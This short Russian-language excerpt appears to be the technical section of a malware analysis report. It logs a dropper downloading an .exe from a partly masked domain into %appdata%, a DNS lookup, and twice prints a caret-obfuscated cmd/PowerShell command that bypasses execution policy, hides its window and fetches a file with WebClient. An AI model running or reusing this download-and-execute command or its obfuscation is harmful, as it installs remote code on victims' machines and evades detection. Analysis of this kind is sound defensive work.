Техническая информация
- http://ru#####medsdnt95.com/ttt/2002.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^w^E^r^sHell.e^x^e ^-ExecutionPolicY ^By^pAsS -NOProFI^l^E^ -^w^i^nD^o^WSt^YLE HID^dEN^ ^(^New-^o^BJ^eCt S^Y^s^T^e^m^.n^ET.We^BC^LIE^N^T).DOW^N^l^Oadf^IlE^(^'http://ru##...
- DNS ASK ru#####medsdnt95.com
- '<SYSTEM32>\cmd.exe' /c "P^o^w^E^r^sHell.e^x^e ^-ExecutionPolicY ^By^pAsS -NOProFI^l^E^ -^w^i^nD^o^WSt^YLE HID^dEN^ ^(^New-^o^BJ^eCt S^Y^s^T^e^m^.n^ET.We^BC^LIE^N^T).DOW^N^l^Oadf^IlE^(^'http://ru##...' (со скрытым окном)